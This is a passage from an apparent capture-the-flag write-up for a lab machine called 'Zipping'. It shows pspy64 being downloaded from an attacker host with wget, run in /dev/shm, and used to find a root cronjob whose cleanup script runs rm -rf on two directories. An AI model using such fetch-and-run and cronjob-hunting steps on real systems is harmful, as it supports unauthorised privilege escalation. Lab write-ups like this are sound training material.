PSPY
A root cronjob process was discovered
rektsu@zipping:/dev/shm$ wget -q http://10.10.14.4/pspy64 ; chmod 755 /dev/shm/pspy64Delivery complete
rektsu@zipping:/dev/shm$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
doneExecuting PSPY
The root cronjob process is executing a Bash script; /etc/scripts/cleanup.sh
rektsu@zipping:/home/rektsu$ ll /etc/scripts/cleanup.sh
4.0k -rwxr-xr-x 1 root root 292 apr 1 03:27 /etc/scripts/cleanup.sh
rektsu@zipping:/home/rektsu$ cat /etc/scripts/cleanup.sh
#!/bin/bash
zips="/var/www/html/uploads"
config="/home/rektsu/.config"
if /usr/bin/find $zips -mindepth 1 -print -quit 2>/dev/null | grep -q .; then
/usr/bin/rm -rf $zips/*
fi
if /usr/bin/find $config -mindepth 1 -print -quit 2>/dev/null | grep -q .; then
/usr/bin/rm -rf $config/*
fiIt’s wiping out everything in both /var/www/html/uploads and /home/rektsu/.config directories
While it is clear that the author wants to delete the uploaded files at the /var/www/html/uploads directory, it is unclear that what the /home/rektsu/.config directory is about